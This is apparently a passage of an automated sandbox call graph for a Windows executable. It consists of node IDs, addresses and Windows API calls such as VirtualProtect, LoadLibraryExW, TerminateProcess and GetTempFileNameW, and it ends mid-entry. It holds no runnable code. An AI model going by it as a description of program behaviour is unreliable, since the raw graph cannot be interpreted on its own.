100871->100892 100872 40c4fb 100873 40c528 Mailbox 100872->100873 101277 399a3c 59 API calls Mailbox 100872->101277 100873->100797 100875 40c4e2 101261 397cab 100875->101261 100876 398047 59 API calls 100876->100892 100878 40c4fd 100880 397cab 59 API calls 100878->100880 100883 40c50c 100880->100883 100881 397e4f 59 API calls 100884 40c3a9 CharUpperBuffW 100881->100884 100885 397b2e 59 API calls 100883->100885 101259 39843a 68 API calls 100884->101259 100885->100872 100886 397e4f 59 API calls 100887 40c469 CharUpperBuffW 100886->100887 101260 39c5a7 69 API calls 2 library calls 100887->101260 100890 399837 85 API calls 100890->100892 100891 397cab 59 API calls 100891->100892 100892->100870 100892->100871 100892->100872 100892->100873 100892->100875 100892->100876 100892->100878 100892->100881 100892->100886 100892->100890 100892->100891 100893 397b2e 59 API calls 100892->100893 100893->100892 100895 3f7962 100894->100895 100896 3b0db6 Mailbox 59 API calls 100895->100896 100897 3f7970 100896->100897 100898 397667 59 API calls 100897->100898 100899 3f797e 100897->100899 100898->100899 100899->100797 100901 397df0 __NMSG_WRITE _memmove 100900->100901 100902 3b0db6 Mailbox 59 API calls 100901->100902 100903 397e2e 100902->100903 100903->100797 100905 40bcb0 100904->100905 100906 40bc96 100904->100906 101291 40a213 59 API calls Mailbox 100905->101291 101290 3f9e4a 90 API calls 4 library calls 100906->101290 100909 40bcbb 100910 399ea0 331 API calls 100909->100910 100911 40bd1c 100910->100911 100912 40bdae 100911->100912 100915 40bd5d 100911->100915 100937 40bca8 Mailbox 100911->100937 100913 40be04 100912->100913 100914 40bdb4 100912->100914 100916 399837 85 API calls 100913->100916 100913->100937 101312 3f791a 59 API calls 100914->101312 101292 3f72df 59 API calls Mailbox 100915->101292 100918 40be16 100916->100918 100921 397e4f 59 API calls 100918->100921 100919 40bdd7 101313 395d41 59 API calls Mailbox 100919->101313 100924 40be3a CharUpperBuffW 100921->100924 100923 40bd8d 101293 39f460 100923->101293 100927 40be54 100924->100927 100925 40bddf Mailbox 101314 39fce0 100925->101314 100928 40bea7 100927->100928 100929 40be5b 100927->100929 100931 399837 85 API calls 100928->100931 101394 3f72df 59 API calls Mailbox 100929->101394 100932 40beaf 100931->100932 101395 399e5d 60 API calls 100932->101395 100935 40be89 100936 39f460 331 API calls 100935->100936 100936->100937 100937->100797 100938 40beb9 100938->100937 100939 399837 85 API calls 100938->100939 100940 40bed4 100939->100940 101396 395d41 59 API calls Mailbox 100940->101396 100942 40bee4 100943 39fce0 331 API calls 100942->100943 100943->100937 102596 3e60c0 100944->102596 100946 3e618c 100946->100797 100947->100775 100948->100775 100951 399c9b 100949->100951 100950 399cd2 100950->100797 100951->100950 102601 398cd4 59 API calls Mailbox 100951->102601 100953 399cfd 100953->100797 100955 399d4a 100954->100955 100965 399d78 Mailbox 100954->100965 100956 399d9d 100955->100956 100959 399d50 Mailbox 100955->100959 100957 398047 59 API calls 100956->100957 100957->100965 100958 399d64 100960 399dcc 100958->100960 100961 399d6f 100958->100961 100958->100965 100959->100958 100962 3cfa0f 100959->100962 100960->100965 102602 398cd4 59 API calls Mailbox 100960->102602 100963 3cf9e6 VariantClear 100961->100963 100961->100965 100962->100965 102603 3e6e8f 59 API calls 100962->102603 100963->100965 100965->100796 100967->100799 100968->100797 100969->100767 100971 39805a 100970->100971 100972 398052 100970->100972 100971->100778 102604 397f77 59 API calls 2 library calls 100972->102604 100974->100792 100975->100792 100976->100778 100977->100781 100978->100778 100982 3b0dbe 100979->100982 100981 3b0dd8 100981->100825 100982->100981 100984 3b0ddc std::exception::exception 100982->100984 100995 3b571c 100982->100995 101012 3b33a1 DecodePointer 100982->101012 101013 3b859b RaiseException 100984->101013 100986 3b0e06 101014 3b84d1 58 API calls _free 100986->101014 100988 3b0e18 100988->100825 100989->100825 100990->100825 100991->100817 100992->100823 100993->100828 100994->100823 100996 3b5797 100995->100996 101008 3b5728 100995->101008 101021 3b33a1 DecodePointer 100996->101021 100998 3b5733 100998->101008 101015 3ba16b 58 API calls 2 library calls 100998->101015 101016 3ba1c8 58 API calls 7 library calls 100998->101016 101017 3b309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100998->101017 100999 3b579d 101022 3b8b28 58 API calls __getptd_noexit 100999->101022 101002 3b575b RtlAllocateHeap 101002->101008 101011 3b578f 101002->101011 101004 3b5783 101019 3b8b28 58 API calls __getptd_noexit 101004->101019 101008->100998 101008->101002 101008->101004 101009 3b5781 101008->101009 101018 3b33a1 DecodePointer 101008->101018 101020 3b8b28 58 API calls __getptd_noexit 101009->101020 101011->100982 101012->100982 101013->100986 101014->100988 101015->100998 101016->100998 101018->101008 101019->101009 101020->101011 101021->100999 101022->101011 101061 399837 101023->101061 101027 40cdb9 101028 40cf2e 101027->101028 101032 40cdc7 101027->101032 101128 40d8c8 93 API calls Mailbox 101028->101128 101031 40cf3d 101031->101032 101033 40cf49 101031->101033 101092 40c96e 101032->101092 101048 40cb61 Mailbox 101033->101048 101034 399837 85 API calls 101049 40cbb2 Mailbox 101034->101049 101039 40ce00 101107 3b0c08 101039->101107 101042 40ce33 101114 3992ce 101042->101114 101043 40ce1a 101113 3f9e4a 90 API calls 4 library calls 101043->101113 101046 40ce25 GetCurrentProcess TerminateProcess 101046->101042 101048->100832 101049->101027 101049->101034 101049->101048 101111 40fbce 59 API calls 2 library calls 101049->101111 101112 40cfdf 61 API calls 2 library calls 101049->101112 101053 40cfa4 101053->101048 101056 40cfb8 FreeLibrary 101053->101056 101054 40ce6b 101126 40d649 108 API calls _free 101054->101126 101056->101048 101059 399d3c 60 API calls 101060 40ce7c 101059->101060 101060->101053 101060->101059 101127 398d40 59 API calls Mailbox 101060->101127 101129 40d649 108 API calls _free 101060->101129 101063 399851 101061->101063 101071 39984b 101061->101071 101062 3cf5d3 __i64tow 101063->101062 101064 399857 __itow 101063->101064 101065 399899 101063->101065 101069 3cf4da 101063->101069 101068 3b0db6 Mailbox 59 API calls 101064->101068 101130 3b3698 84 API calls 3 library calls 101065->101130 101070 399871 101068->101070 101072 3b0db6 Mailbox 59 API calls 101069->101072 101077 3cf552 Mailbox _wcscpy 101069->101077 101070->101071 101073 397de1 59 API calls 101070->101073 101071->101048 101079 40d7a5 101071->101079 101075 3cf51f 101072->101075 101073->101071 101074 3b0db6 Mailbox 59 API calls 101076 3cf545 101074->101076 101075->101074 101076->101077 101078 397de1 59 API calls 101076->101078 101131 3b3698 84 API calls 3 library calls 101077->101131 101078->101077 101132 397e4f 101079->101132 101081 40d7c0 CharLowerBuffW 101136 3ef167 101081->101136 101084 40d81c Mailbox 101089 40d858 Mailbox 101084->101089 101165 40cfdf 61 API calls 2 library calls 101084->101165 101089->101049 101090 40d810 101161 397d2c 101090->101161 101093 40c989 101092->101093 101097 40c9de 101092->101097 101094 3b0db6 Mailbox 59 API calls 101093->101094 101096 40c9ab 101094->101096 101095 3b0db6 Mailbox 59 API calls 101095->101096 101096->101095 101096->101097 101098 40da50 101097->101098 101099 40dc79 Mailbox 101098->101099 101106 40da73 _strcat _wcscpy __NMSG_WRITE 101098->101106 101099->101039 101100 399b3c 59 API calls 101100->101106 101101 399b98 59 API calls 101101->101106 101102 399be6 59 API calls 101102->101106 101103 3b571c 58 API calls __malloc_crt 101103->101106 101104 399837 85 API calls 101104->101106 101106->101099 101106->101100 101106->101101 101106->101102 101106->101103 101106->101104 101175 3f5887 61 API calls 2 library calls 101106->101175 101108 3b0c1d 101107->101108 101109 3b0cb5 VirtualProtect 101108->101109 101110 3b0c83 101108->101110 101109->101110 101110->101042 101110->101043 101111->101049 101112->101049 101113->101046 101115 3992d6 101114->101115 101116 3b0db6 Mailbox 59 API calls 101115->101116 101117 3992e4 101116->101117 101118 3992f0 101117->101118 101176 3991fc 59 API calls Mailbox 101117->101176 101120 399050 101118->101120 101177 399160 101120->101177 101122 39905f 101123 3b0db6 Mailbox 59 API calls 101122->101123 101124 3990fb 101122->101124 101123->101124 101124->101060 101125 398d40 59 API calls Mailbox 101124->101125 101125->101054 101126->101060 101127->101060 101128->101031 101129->101060 101130->101064 101131->101062 101133 397e62 101132->101133 101135 397e5f _memmove 101132->101135 101134 3b0db6 Mailbox 59 API calls 101133->101134 101134->101135 101135->101081 101138 3ef192 __NMSG_WRITE 101136->101138 101137 3ef1d1 101137->101084 101143 397667 101137->101143 101138->101137 101139 3ef278 101138->101139 101140 3ef1c7 101138->101140 101139->101137 101167 3978c4 61 API calls 101139->101167 101140->101137 101166 3978c4 61 API calls 101140->101166 101144 3b0db6 Mailbox 59 API calls 101143->101144 101145 397688 101144->101145 101146 3b0db6 Mailbox 59 API calls 101145->101146 101147 397696 101146->101147 101148 39784b 101147->101148 101149 39785a 101148->101149 101150 3978b7 101148->101150 101149->101150 101151 397865 101149->101151 101152 397d2c 59 API calls 101150->101152 101153 3ceb09 101151->101153 101154 397880 101151->101154 101157 397888 _memmove 101152->101157 101172 398029 101153->101172 101168 397f27 101154->101168 101157->101090 101158 3ceb13 101159 3b0db6 Mailbox 59 API calls 101158->101159 101160 3ceb33 101159->101160 101162 397d3a 101161->101162 101164 397d43 _memmove 101161->101164 101163 397e4f 59 API calls 101162->101163 101162->101164 101163->101164 101164->101084 101165->101089 101166->101140 101167->101139 101169 397f3f 101168->101169 101171 397f39 101168->101171 101170 3b0db6 Mailbox 59 API calls 101169->101170 101170->101171 101171->101157 101173 3b0db6 Mailbox 59 API calls 101172->101173 101174 398033 101173->101174 101174->101158 101175->101106 101176->101118 101178 399169 Mailbox 101177->101178 101179 3cf19f 101178->101179 101184 399173 101178->101184 101181 3b0db6 Mailbox 59 API calls 101179->101181 101180 39917a 101180->101122 101182 3cf1ab 101181->101182 101183 399c90 Mailbox 59 API calls 101183->101184 101184->101180 101184->101183 101186 399b52 101185->101186 101187 399b4d 101185->101187 101186->100839 101187->101186 101190 3b358a 59 API calls 101187->101190 101189->100843 101190->101186 101217 397a16 101191->101217 101193 39646a 101224 39750f 101193->101224 101196 396484 Mailbox 101196->100850 101198 3cdff6 101234 3ef8aa 92 API calls 4 library calls 101198->101234 101199 39750f 59 API calls 101210 396265 101199->101210 101203 3ce004 101205 39750f 59 API calls 101203->101205 101204 397d8c 59 API calls 101204->101210 101206 3ce01a 101205->101206 101206->101196 101207 396799 _memmove 101235 3ef8aa 92 API calls 4 library calls 101207->101235 101208 3cdf92 101209 398029 59 API calls 101208->101209 101211 3cdf9d 101209->101211 101210->101193 101210->101198 101210->101199 101210->101204 101210->101207 101210->101208 101213 397e4f 59 API calls 101210->101213 101222 395f6c 60 API calls 101210->101222 101223 395d41 59 API calls Mailbox 101210->101223 101232 395e72 60 API calls 101210->101232 101233 397924 59 API calls 2 library calls 101210->101233 101215 3b0db6 Mailbox 59 API calls 101211->101215 101214 39643b CharUpperBuffW 101213->101214 101214->101210 101215->101207 101216->100854 101218 3b0db6 Mailbox 59 API calls 101217->101218 101219 397a3b 101218->101219 101220 398029 59 API calls 101219->101220 101221 397a4a 101220->101221 101221->101210 101222->101210 101223->101210 101225 3975af 101224->101225 101231 397522 _memmove 101224->101231 101227 3b0db6 Mailbox 59 API calls 101225->101227 101226 3b0db6 Mailbox 59 API calls 101228 397529 101226->101228 101227->101231 101229 3b0db6 Mailbox 59 API calls 101228->101229 101230 397552 101228->101230 101229->101230 101230->101196 101231->101226 101232->101210 101233->101210 101234->101203 101235->101196 101237 3f78ea 101236->101237 101238 3f77ca 101236->101238 101237->100857 101239 3f77e2 101238->101239 101240 3f780a 101238->101240 101244 3f7821 101238->101244 101239->101240 101249 3f77f2 101239->101249 101241 3b0db6 Mailbox 59 API calls 101240->101241 101242 3f7800 Mailbox _memmove 101241->101242 101252 3b0db6 Mailbox 59 API calls 101242->101252 101243 3f783e 101243->101242 101246 3f7869 101243->101246 101247 3f7877 101243->101247 101244->101243 101245 3b0db6 Mailbox 59 API calls 101244->101245 101245->101243 101250 3b0db6 Mailbox 59 API calls 101246->101250 101248 3b0db6 Mailbox 59 API calls 101247->101248 101251 3f787d 101248->101251 101253 3b0db6 Mailbox 59 API calls 101249->101253 101250->101242 101257 3f746b 59 API calls Mailbox 101251->101257 101252->101237 101253->101242 101255 3f7889 101258 395a15 61 API calls Mailbox 101255->101258 101257->101255 101258->101242 101259->100892 101260->100892 101262 3ced4a 101261->101262 101263 397cbf 101261->101263 101265 398029 59 API calls 101262->101265 101278 397c50 101263->101278 101267 3ced55 __NMSG_WRITE _memmove 101265->101267 101266 397cca 101268 397b2e 101266->101268 101269 3cec6b 101268->101269 101270 397b40 101268->101270 101289 3e7bdb 59 API calls _memmove 101269->101289 101283 397a51 101270->101283 101273 397b4c 101273->100872 101274 3cec75 101275 398047 59 API calls 101274->101275 101276 3cec7d Mailbox 101275->101276 101277->100873 101279 397c5f __NMSG_WRITE 101278->101279 101280 398029 59 API calls 101279->101280 101281 397c70 _memmove 101279->101281 101282 3ced07 _memmove 101280->101282 101281->101266 101284 397a5f 101283->101284 101288 397a85 _memmove 101283->101288 101285 3b0db6 Mailbox 59 API calls 101284->101285 101284->101288 101286 397ad4 101285->101286 101287 3b0db6 Mailbox 59 API calls 101286->101287 101287->101288 101288->101273 101289->101274 101290->100937 101291->100909 101292->100923 101294 39f4ba 101293->101294 101295 39f650 101293->101295 101296 3d441e 101294->101296 101297 39f4c6 101294->101297 101298 397de1 59 API calls 101295->101298 101299 40bc6b 332 API calls 101296->101299 101486 39f290 332 API calls 2 library calls 101297->101486 101304 39f58c Mailbox 101298->101304 101301 3d442c 101299->101301 101305 39f630 101301->101305 101487 3f9e4a 90 API calls 4 library calls 101301->101487 101303 39f4fd 101303->101301 101303->101304 101303->101305 101311 40445a 332 API calls 101304->101311 101397 3fcb7a 101304->101397 101477 3f3c37 101304->101477 101480 394e4a 101304->101480 101305->100937 101306 399c90 Mailbox 59 API calls 101307 39f5e3 101306->101307 101307->101305 101307->101306 101311->101307 101312->100919 101313->100925 102353 398180 101314->102353 101316 39fd3d 101317 3d472d 101316->101317 101379 3a06f6 101316->101379 102358 39f234 101316->102358 102460 3f9e4a 90 API calls 4 library calls 101317->102460 101321 39fe3e 101322 3d488d 101321->101322 101325 39fe4c 101321->101325 102464 3e66ec 59 API calls 2 library calls 101321->102464 101322->101325 101372 3d4742 101322->101372 102466 40a2d9 86 API calls Mailbox 101322->102466 101323 3d4b53 101323->101372 102485 3f9e4a 90 API calls 4 library calls 101323->102485 101324 3a0517 101333 3b0db6 Mailbox 59 API calls 101324->101333 101325->101323 101335 3d48f9 101325->101335 102362 39837c 101325->102362 101326 3d47d7 101326->101372 102462 3f9e4a 90 API calls 4 library calls 101326->102462 101328 3d4755 101328->101326 102461 39f6a3 332 API calls 101328->102461 101330 3b0db6 59 API calls Mailbox 101336 39fdd3 101330->101336 101340 3a0545 _memmove 101333->101340 101334 3d4848 102465 3e60ef 59 API calls 2 library calls 101334->102465 101341 3d4917 101335->101341 102468 3985c0 101335->102468 101336->101321 101336->101324 101336->101328 101336->101330 101336->101340 101357 399ea0 332 API calls 101336->101357 101367 3d480c 101336->101367 101336->101372 101352 3b0db6 Mailbox 59 API calls 101340->101352 101348 3d4928 101341->101348 101349 3985c0 59 API calls 101341->101349 101342 39fea4 101350 3d4ad6 101342->101350 101351 39ff32 101342->101351 101386 3a0179 Mailbox _memmove 101342->101386 101343 3d486b 101346 399ea0 332 API calls 101343->101346 101344 3d48b2 Mailbox 101344->101325 102467 3e66ec 59 API calls 2 library calls 101344->102467 101346->101322 101348->101386 102476 3e60ab 59 API calls Mailbox 101348->102476 101349->101348 102484 3f9ae7 60 API calls 101350->102484 101355 3b0db6 Mailbox 59 API calls 101351->101355 101392 3a0106 _memmove 101352->101392 101359 39ff39 101355->101359 101357->101336 101358 3d4a4d 101360 399ea0 332 API calls 101358->101360 101359->101379 102369 3a09d0 101359->102369 101362 3d4a87 101360->101362 101362->101372 102479 3984c0 101362->102479 101364 39ffb2 101364->101340 101365 39ffe6 101364->101365 101364->101379 101376 398047 59 API calls 101365->101376 101377 3a0007 101365->101377 102463 3f9e4a 90 API calls 4 library calls 101367->102463 101371 3d4ab2 102483 3f9e4a 90 API calls 4 library calls 101371->102483 101374 399c90 Mailbox 59 API calls 101374->101392 101375 399d3c 60 API calls 101375->101386 101376->101377 101377->101379 101381 3d4b24 101377->101381 101383 3a004c 101377->101383 101378 3a0398 101378->100937 102459 3f9e4a 90 API calls 4 library calls 101379->102459 101380 3b0db6 59 API calls Mailbox 101380->101386 101382 399d3c 60 API calls 101381->101382 101382->101323 101383->101323 101383->101379 101384 3a00d8 101383->101384 101385 399d3c 60 API calls 101384->101385 101388 3a00eb 101385->101388 101386->101358 101386->101371 101386->101375 101386->101378 101386->101379 101386->101380 101387 3d4a1c 101386->101387 102457 398740 68 API calls __cinit 101386->102457 102458 398660 68 API calls 101386->102458 102477 3f5937 68 API calls 101386->102477 102478 3989b3 69 API calls Mailbox 101386->102478 101390 3b0db6 Mailbox 59 API calls 101387->101390 101388->101379 102446 3982df 101388->102446 101390->101358 101392->101374 101392->101386 101393 3a0162 101392->101393 101393->100937 101394->100935 101395->100938 101396->100942 101398 397667 59 API calls 101397->101398 101399 3fcbaf 101398->101399 101400 397667 59 API calls 101399->101400 101401 3fcbb8 101400->101401 101402 3fcbcc 101401->101402 101403 399b3c 59 API calls 101401->101403 101404 399837 85 API calls 101402->101404 101403->101402 101405 3fcbe9 101404->101405 101406 3fcc0b 101405->101406 101407 3fccea 101405->101407 101412 3fcd1a Mailbox 101405->101412 101409 399837 85 API calls 101406->101409 101488 394ddd 101407->101488 101410 3fcc17 101409->101410 101413 398047 59 API calls 101410->101413 101412->101307 101415 3fcc23 101413->101415 101414 3fcd16 101414->101412 101417 397667 59 API calls 101414->101417 101420 3fcc69 101415->101420 101421 3fcc37 101415->101421 101416 394ddd 136 API calls 101416->101414 101418 3fcd4b 101417->101418 101419 397667 59 API calls 101418->101419 101422 3fcd54 101419->101422 101425 399837 85 API calls 101420->101425 101424 398047 59 API calls 101421->101424 101423 397667 59 API calls 101422->101423 101426 3fcd5d 101423->101426 101427 3fcc47 101424->101427 101428 3fcc76 101425->101428 101430 397667 59 API calls 101426->101430 101431 397cab 59 API calls 101427->101431 101429 398047 59 API calls 101428->101429 101432 3fcc82 101429->101432 101433 3fcd66 101430->101433 101434 3fcc51 101431->101434 101675 3f4a31 GetFileAttributesW 101432->101675 101436 399837 85 API calls 101433->101436 101437 399837 85 API calls 101434->101437 101439 3fcd73 101436->101439 101440 3fcc5d 101437->101440 101438 3fcc8b 101441 3fcc9e 101438->101441 101444 3979f2 59 API calls 101438->101444 101512 39459b 101439->101512 101443 397b2e 59 API calls 101440->101443 101446 399837 85 API calls 101441->101446 101452 3fcca4 101441->101452 101443->101420 101444->101441 101445 3fcd8e 101563 3979f2 101445->101563 101448 3fcccb 101446->101448 101676 3f37ef 75 API calls Mailbox 101448->101676 101451 3fcdd1 101453 398047 59 API calls 101451->101453 101452->101412 101455 3fcddf 101453->101455 101454 3979f2 59 API calls 101456 3fcdae 101454->101456 101457 397b2e 59 API calls 101455->101457 101456->101451 101677 397bcc 101456->101677 101458 3fcded 101457->101458 101460 397b2e 59 API calls 101458->101460 101463 3fcdfb 101460->101463 101461 3fcdc3 101462 397bcc 59 API calls 101461->101462 101462->101451 101464 397b2e 59 API calls 101463->101464 101465 3fce09 101464->101465 101466 399837 85 API calls 101465->101466 101467 3fce15 101466->101467 101566 3f4071 101467->101566 101469 3fce26 101470 3f3c37 3 API calls 101469->101470 101471 3fce30 101470->101471 101472 399837 85 API calls 101471->101472 101476 3fce61 101471->101476 101473 3fce4e 101472->101473 101620 3f9155 101473->101620 101475 394e4a 84 API calls 101475->101412 101476->101475 102349 3f445a GetFileAttributesW 101477->102349 101481 394e5b 101480->101481 101482 394e54 101480->101482 101484 394e7b FreeLibrary 101481->101484 101485 394e6a 101481->101485 101483 3b53a6 __fcloseall 83 API calls 101482->101483 101483->101481 101484->101485 101485->101307 101486->101303 101487->101305 101686 394bb5 101488->101686 101493 394e08 LoadLibraryExW 101696 394b6a 101493->101696 101494 3cd8e6 101496 394e4a 84 API calls 101494->101496 101498 3cd8ed 101496->101498 101500 394b6a 3 API calls 101498->101500 101502 3cd8f5 101500->101502 101501 394e2f 101501->101502 101503 394e3b 101501->101503 101722 394f0b 101502->101722 101505 394e4a 84 API calls 101503->101505 101507 394e40 101505->101507 101507->101414 101507->101416 101509 3cd91c 101730 394ec7 101509->101730 101513 397667 59 API calls 101512->101513 101514 3945b1 101513->101514 101515 397667 59 API calls 101514->101515 101516 3945b9 101515->101516 101517 397667 59 API calls 101516->101517 101518 3945c1 101517->101518 101519 397667 59 API calls 101518->101519 101520 3945c9 101519->101520 101521 3945fd 101520->101521 101522 3cd4d2 101520->101522 101523 39784b 59 API calls 101521->101523 101524 398047 59 API calls 101522->101524 101525 39460b 101523->101525 101526 3cd4db 101524->101526 101527 397d2c 59 API calls 101525->101527 102030 397d8c 101526->102030 101529 394615 101527->101529 101531 39784b 59 API calls 101529->101531 101532 394640 101529->101532 101530 394680 101535 39784b 59 API calls 101530->101535 101533 394636 101531->101533 101532->101530 101534 39465f 101532->101534 101550 3cd4fb 101532->101550 101536 397d2c 59 API calls 101533->101536 101538 3979f2 59 API calls 101534->101538 101539 394691 101535->101539 101536->101532 101537 3cd5cb 101540 397bcc 59 API calls 101537->101540 101541 394669 101538->101541 101542 3946a3 101539->101542 101543 398047 59 API calls 101539->101543 101558 3cd588 101540->101558 101541->101530 101546 39784b 59 API calls 101541->101546 101544 3946b3 101542->101544 101545 398047 59 API calls 101542->101545 101543->101542 101547 398047 59 API calls 101544->101547 101548 3946ba 101544->101548 101545->101544 101546->101530 101547->101548 101549 398047 59 API calls 101548->101549 101560 3946c1 Mailbox 101548->101560 101549->101560 101550->101537 101551 3cd5b4 101550->101551 101557 3cd532 101550->101557 101551->101537 101553 3cd59f 101551->101553 101552 3979f2 59 API calls 101552->101558 101556 397bcc 59 API calls 101553->101556 101554 3cd590 101555 397bcc 59 API calls 101554->101555 101555->101558 101556->101558 101557->101554 101561 3cd57b 101557->101561 101558->101530 101558->101552 102034 397924 59 API calls 2 library calls 101558->102034 101560->101445 101562 397bcc 59 API calls 101561->101562 101562->101558 101564 397e4f 59 API calls 101563->101564 101565 3979fd 101564->101565 101565->101451 101565->101454 101567 3f408d 101566->101567 101568 3f4092 101567->101568 101569 3f40a0 101567->101569 101570 398047 59 API calls 101568->101570 101571 397667 59 API calls 101569->101571 101572 3f409b Mailbox 101570->101572 101573 3f40a8 101571->101573 101572->101469 101574 397667 59 API calls 101573->101574 101575 3f40b0 101574->101575 101576 397667 59 API calls 101575->101576 101577 3f40bb 101576->101577 101578 397667 59 API calls 101577->101578 101579 3f40c3 101578->101579 101580 397667 59 API calls 101579->101580 101581 3f40cb 101580->101581 101582 397667 59 API calls 101581->101582 101583 3f40d3 101582->101583 101584 397667 59 API calls 101583->101584 101585 3f40db 101584->101585 101586 397667 59 API calls 101585->101586 101587 3f40e3 101586->101587 101588 39459b 59 API calls 101587->101588 101589 3f40fa 101588->101589 101590 39459b 59 API calls 101589->101590 101591 3f4113 101590->101591 101592 3979f2 59 API calls 101591->101592 101593 3f411f 101592->101593 101594 3f4132 101593->101594 101595 397d2c 59 API calls 101593->101595 101596 3979f2 59 API calls 101594->101596 101595->101594 101597 3f413b 101596->101597 101598 3f414b 101597->101598 101599 397d2c 59 API calls 101597->101599 101600 398047 59 API calls 101598->101600 101599->101598 101601 3f4157 101600->101601 101602 397b2e 59 API calls 101601->101602 101603 3f4163 101602->101603 102035 3f4223 59 API calls 101603->102035 101605 3f4172 102036 3f4223 59 API calls 101605->102036 101607 3f4185 101608 3979f2 59 API calls 101607->101608 101609 3f418f 101608->101609 101610 3f41a6 101609->101610 101611 3f4194 101609->101611 101613 3979f2 59 API calls 101610->101613 101612 397cab 59 API calls 101611->101612 101614 3f41a1 101612->101614 101615 3f41af 101613->101615 101619 397b2e 59 API calls 101614->101619 101616 3f41cd 101615->101616 101618 397cab 59 API calls 101615->101618 101617 397b2e 59 API calls 101616->101617 101617->101572 101618->101614 101619->101616 101621 3f9162 __write_nolock 101620->101621 101622 3b0db6 Mailbox 59 API calls 101621->101622 101623 3f91bf 101622->101623 101624 39522e 59 API calls 101623->101624 101625 3f91c9 101624->101625 101626 3f8f5f GetSystemTimeAsFileTime 101625->101626 101627 3f91d4 101626->101627 101628 394ee5 85 API calls 101627->101628 101629 3f91e7 _wcscmp 101628->101629 101630 3f920b 101629->101630 101631 3f92b8 101629->101631 102067 3f9734 101630->102067 101633 3f9734 96 API calls 101631->101633 101648 3f9284 _wcscat 101633->101648 101636 394f0b 74 API calls 101637 3f92dd 101636->101637 101639 394f0b 74 API calls 101637->101639 101638 3f92c1 101638->101476 101641 3f92ed 101639->101641 101640 3f9239 _wcscat _wcscpy 102074 3b40fb 58 API calls __wsplitpath_helper 101640->102074 101642 394f0b 74 API calls 101641->101642 101644 3f9308 101642->101644 101645 394f0b 74 API calls 101644->101645 101646 3f9318 101645->101646 101647 394f0b 74 API calls 101646->101647 101649 3f9333 101647->101649 101648->101636 101648->101638 101650 394f0b 74 API calls 101649->101650 101651 3f9343 101650->101651 101652 394f0b 74 API calls 101651->101652 101653 3f9353 101652->101653 101654 394f0b 74 API calls 101653->101654 101655 3f9363 101654->101655 102037 3f98e3 GetTempPathW GetTempFileNameW 101655->102037 101657 3f936f 101658 3b525b 115 API calls 101657->101658 101668 3f9380 101658->101668 101659 3f943a 102051 3b53a6 101659->102051 101661 3f9445 101662 394f0b 74 API calls 101662->101668 101668->101638 101668->101659 101668->101662 102038 3b4863 101668->102038 101675->101438 101676->101452 101678 397bd8 __NMSG_WRITE 101677->101678 101679 397c45 101677->101679 101681 397bee 101678->101681 101682 397c13 101678->101682 101680 397d2c 59 API calls 101679->101680 101685 397bf6 _memmove 101680->101685 101684 397f27 59 API calls 101681->101684 101683 398029 59 API calls 101682->101683 101683->101685 101684->101685 101685->101461 101735 394c03 101686->101735 101689 394c03 2 API calls 101692 394bdc 101689->101692 101690 394bec FreeLibrary 101691 394bf5 101690->101691 101693 3b525b 101691->101693 101692->101690 101692->101691 101739 3b5270 101693->101739 101695 394dfc 101695->101493 101695->101494 101945 394c36 101696->101945 101699 394b8f 101701 394baa 101699->101701 101702 394ba1 FreeLibrary 101699->101702 101700 394c36 2 API calls 101700->101699 101703 394c70 101701->101703 101702->101701 101704 3b0db6 Mailbox 59 API calls 101703->101704 101705 394c85 101704->101705 101949 39522e 101705->101949 101707 394c91 _memmove 101708 394ccc 101707->101708 101709 394d89 101707->101709 101710 394dc1 101707->101710 101711 394ec7 69 API calls 101708->101711 101952 394e89 CreateStreamOnHGlobal 101709->101952 101963 3f991b 95 API calls 101710->101963 101718 394cd5 101711->101718 101714 394f0b 74 API calls 101714->101718 101715 394d69 101715->101501 101717 3cd8a7 101719 394ee5 85 API calls 101717->101719 101718->101714 101718->101715 101718->101717 101958 394ee5 101718->101958 101720 3cd8bb 101719->101720 101721 394f0b 74 API calls 101720->101721 101721->101715 101723 3cd9cd 101722->101723 101724 394f1d 101722->101724 101987 3b55e2 101724->101987 101727 3f9109 102007 3f8f5f 101727->102007 101729 3f911f 101729->101509 101731 3cd990 101730->101731 101732 394ed6 101730->101732 102012 3b5c60 101732->102012 101734 394ede 101736 394bd0 101735->101736 101737 394c0c LoadLibraryA 101735->101737 101736->101689 101736->101692 101737->101736 101738 394c1d GetProcAddress 101737->101738 101738->101736 101740 3b527c _fseek 101739->101740 101741 3b528f 101740->101741 101744 3b52c0 101740->101744 101788 3b8b28 58 API calls __getptd_noexit 101741->101788 101743 3b5294 101789 3b8db6 9 API calls __gmtime64_s 101743->101789 101758 3c04e8 101744->101758 101747 3b52c5 101748 3b52db 101747->101748 101749 3b52ce 101747->101749 101751 3b5305 101748->101751 101752 3b52e5 101748->101752 101790 3b8b28 58 API calls __getptd_noexit 101749->101790 101773 3c0607 101751->101773 101791 3b8b28 58 API calls __getptd_noexit 101752->101791 101753 3b529f _fseek @_EH4_CallFilterFunc@8 101753->101695 101759 3c04f4 _fseek 101758->101759 101793 3b9c0b 101759->101793 101761 3c0576 101800 3c05fe 101761->101800 101762 3c057d 101829 3b881d 58 API calls 2 library calls 101762->101829 101765 3c05f3 _fseek 101765->101747 101766 3c0584 101766->101761 101830 3b9e2b InitializeCriticalSectionAndSpinCount 101766->101830 101770 3c05aa EnterCriticalSection 101770->101761 101771 3c0502 101771->101761 101771->101762 101803 3b9c93 101771->101803 101827 3b6c50 59 API calls __lock 101771->101827 101828 3b6cba LeaveCriticalSection LeaveCriticalSection _doexit 101771->101828 101782 3c0627 __wopenfile 101773->101782 101774 3c0641 101850 3b8b28 58 API calls __getptd_noexit 101774->101850 101775 3c07fc 101775->101774 101780 3c085f 101775->101780 101777 3c0646 101851 3b8db6 9 API calls __gmtime64_s 101777->101851 101779 3b5310 101792 3b5332 LeaveCriticalSection LeaveCriticalSection _fprintf 101779->101792 101847 3c85a1 101780->101847 101782->101774 101782->101775 101782->101782 101852 3b37cb 60 API calls 2 library calls 101782->101852 101784 3c07f5 101784->101775 101853 3b37cb 60 API calls 2 library calls 101784->101853 101786 3c0814 101786->101775 101854 3b37cb 60 API calls 2 library calls 101786->101854 101788->101743 101789->101753 101790->101753 101791->101753 101792->101753 101794 3b9c2f EnterCriticalSection 101793->101794 101795 3b9c1c 101793->101795 101794->101771 101796 3b9c93 __mtinitlocknum 57 API calls 101795->101796 101797 3b9c22 101796->101797 101797->101794 101831 3b30b5 58 API calls 3 library calls 101797->101831 101832 3b9d75 LeaveCriticalSection 101800->101832 101802 3c0605 101802->101765 101804 3b9c9f _fseek 101803->101804 101805 3b9ca8 101804->101805 101806 